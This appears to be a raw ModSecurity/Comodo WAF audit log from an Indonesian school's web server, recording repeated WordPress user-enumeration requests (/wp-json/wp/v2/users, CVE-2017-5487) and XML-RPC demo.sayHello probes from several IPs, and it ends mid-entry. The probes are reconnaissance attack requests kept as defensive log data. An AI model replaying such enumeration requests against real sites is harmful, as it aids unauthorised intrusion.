Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d333a24a-Z-- --58d77002-A-- [17/May/2025:09:36:07 +0700] aCf2FwTOsBn9MSWb6WJvAAAAAJM 103.236.140.4 45276 103.236.140.4 8181 --58d77002-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --58d77002-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --58d77002-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747449367779645 2584 (- - -) Stopwatch2: 1747449367779645 2584; combined=1237, p1=415, p2=793, p3=0, p4=0, p5=29, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58d77002-Z-- --d3e7904d-A-- [17/May/2025:09:36:13 +0700] aCf2HQTOsBn9MSWb6WJvAgAAAJY 103.236.140.4 45282 103.236.140.4 8181 --d3e7904d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.6 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d3e7904d-C-- demo.sayHello --d3e7904d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3e7904d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747449373707686 6701 (- - -) Stopwatch2: 1747449373707686 6701; combined=4820, p1=688, p2=3884, p3=42, p4=41, p5=98, sr=157, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3e7904d-Z-- --ed9b0b6c-A-- [17/May/2025:09:36:41 +0700] aCf2OQTOsBn9MSWb6WJvBQAAAIE 103.236.140.4 45288 103.236.140.4 8181 --ed9b0b6c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.84 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ed9b0b6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed9b0b6c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747449401369268 2496 (- - -) Stopwatch2: 1747449401369268 2496; combined=1131, p1=381, p2=721, p3=0, p4=0, p5=29, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed9b0b6c-Z-- --1732850a-A-- [17/May/2025:09:36:48 +0700] aCf2QATOsBn9MSWb6WJvBwAAAIQ 103.236.140.4 45292 103.236.140.4 8181 --1732850a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.84 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1732850a-C-- demo.sayHello --1732850a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1732850a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747449408008609 6467 (- - -) Stopwatch2: 1747449408008609 6467; combined=4662, p1=622, p2=3797, p3=39, p4=44, p5=96, sr=81, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1732850a-Z-- --d151e660-A-- [17/May/2025:09:36:50 +0700] aCf2QgTOsBn9MSWb6WJvCAAAAII 103.236.140.4 45294 103.236.140.4 8181 --d151e660-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.100.167 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.100.167 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d151e660-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d151e660-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747449410947866 2286 (- - -) Stopwatch2: 1747449410947866 2286; combined=1160, p1=395, p2=734, p3=0, p4=0, p5=31, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d151e660-Z-- --8af1fd1f-A-- [17/May/2025:09:36:55 +0700] aCf2RxKi5m5upc8uMd6iXAAAAMo 103.236.140.4 45300 103.236.140.4 8181 --8af1fd1f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.196.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.196.97 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8af1fd1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8af1fd1f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747449415113180 2080 (- - -) Stopwatch2: 1747449415113180 2080; combined=1044, p1=361, p2=654, p3=0, p4=0, p5=29, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8af1fd1f-Z-- --83e40c15-A-- [17/May/2025:09:36:56 +0700] aCf2SATOsBn9MSWb6WJvCwAAAIs 103.236.140.4 45302 103.236.140.4 8181 --83e40c15-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.100.167 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.100.167 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --83e40c15-C-- demo.sayHello --83e40c15-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --83e40c15-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747449416288739 4518 (- - -) Stopwatch2: 1747449416288739 4518; combined=3527, p1=424, p2=2902, p3=24, p4=26, p5=89, sr=68, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83e40c15-Z-- --2ac54a46-A-- [17/May/2025:09:37:00 +0700] aCf2TATOsBn9MSWb6WJvDQAAAIw 103.236.140.4 45306 103.236.140.4 8181 --2ac54a46-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.196.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.196.97 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2ac54a46-C-- demo.sayHello --2ac54a46-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ac54a46-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747449420121679 5529 (- - -) Stopwatch2: 1747449420121679 5529; combined=4051, p1=485, p2=3346, p3=28, p4=30, p5=95, sr=71, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2ac54a46-Z-- --754d371d-A-- [17/May/2025:09:37:53 +0700] aCf2gem4kjNN-hEbWjJBugAAAEw 103.236.140.4 45378 103.236.140.4 8181 --754d371d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.36.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.36.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --754d371d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --754d371d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747449473834168 2942 (- - -) Stopwatch2: 1747449473834168 2942; combined=1276, p1=415, p2=827, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --754d371d-Z-- --f907865f-A-- [17/May/2025:09:38:00 +0700] aCf2iHyxdQCiyU1ENFcolQAAAA4 103.236.140.4 45434 103.236.140.4 8181 --f907865f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.36.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.36.198 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f907865f-C-- demo.sayHello --f907865f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f907865f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747449480191783 5822 (- - -) Stopwatch2: 1747449480191783 5822; combined=4367, p1=553, p2=3466, p3=33, p4=35, p5=155, sr=73, sw=125, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f907865f-Z-- --7762d464-A-- [17/May/2025:09:38:15 +0700] aCf2lxKi5m5upc8uMd6iegAAAM0 103.236.140.4 45546 103.236.140.4 8181 --7762d464-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.193 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.193 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7762d464-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7762d464-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747449495404839 2790 (- - -) Stopwatch2: 1747449495404839 2790; combined=1225, p1=432, p2=765, p3=0, p4=0, p5=28, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7762d464-Z-- --36158d66-A-- [17/May/2025:09:38:25 +0700] aCf2oem4kjNN-hEbWjJBzQAAAFg 103.236.140.4 45594 103.236.140.4 8181 --36158d66-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.193 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.193 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --36158d66-C-- demo.sayHello --36158d66-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --36158d66-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747449505252149 5382 (- - -) Stopwatch2: 1747449505252149 5382; combined=3865, p1=502, p2=3160, p3=30, p4=33, p5=83, sr=65, sw=57, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36158d66-Z-- --f85ae075-A-- [17/May/2025:09:38:44 +0700] aCf2tBKi5m5upc8uMd6ijAAAANc 103.236.140.4 45702 103.236.140.4 8181 --f85ae075-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.85.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.85.163 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f85ae075-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f85ae075-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747449524239804 3066 (- - -) Stopwatch2: 1747449524239804 3066; combined=1350, p1=436, p2=880, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f85ae075-Z-- --198b8672-A-- [17/May/2025:09:38:50 +0700] aCf2uhKi5m5upc8uMd6imQAAANU 103.236.140.4 45746 103.236.140.4 8181 --198b8672-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.85.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.85.163 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --198b8672-C-- demo.sayHello --198b8672-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --198b8672-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747449530466784 4438 (- - -) Stopwatch2: 1747449530466784 4438; combined=3508, p1=418, p2=2891, p3=23, p4=24, p5=89, sr=67, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --198b8672-Z-- --9c088949-A-- [17/May/2025:09:39:14 +0700] aCf20um4kjNN-hEbWjJB1AAAAEs 103.236.140.4 45830 103.236.140.4 8181 --9c088949-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.30 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.30 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9c088949-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c088949-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747449554975492 2493 (- - -) Stopwatch2: 1747449554975492 2493; combined=1199, p1=395, p2=776, p3=0, p4=0, p5=28, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c088949-Z-- --f8195777-A-- [17/May/2025:09:39:20 +0700] aCf22HyxdQCiyU1ENFcorgAAABE 103.236.140.4 45882 103.236.140.4 8181 --f8195777-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.30 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.30 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f8195777-C-- demo.sayHello --f8195777-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f8195777-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747449560848050 5048 (- - -) Stopwatch2: 1747449560848050 5048; combined=4143, p1=526, p2=3334, p3=32, p4=35, p5=122, sr=85, sw=94, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8195777-Z-- --9e02f751-A-- [17/May/2025:09:39:38 +0700] aCf26hKi5m5upc8uMd6ipgAAANU 103.236.140.4 46002 103.236.140.4 8181 --9e02f751-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.1 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.1 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9e02f751-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9e02f751-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747449578233059 2564 (- - -) Stopwatch2: 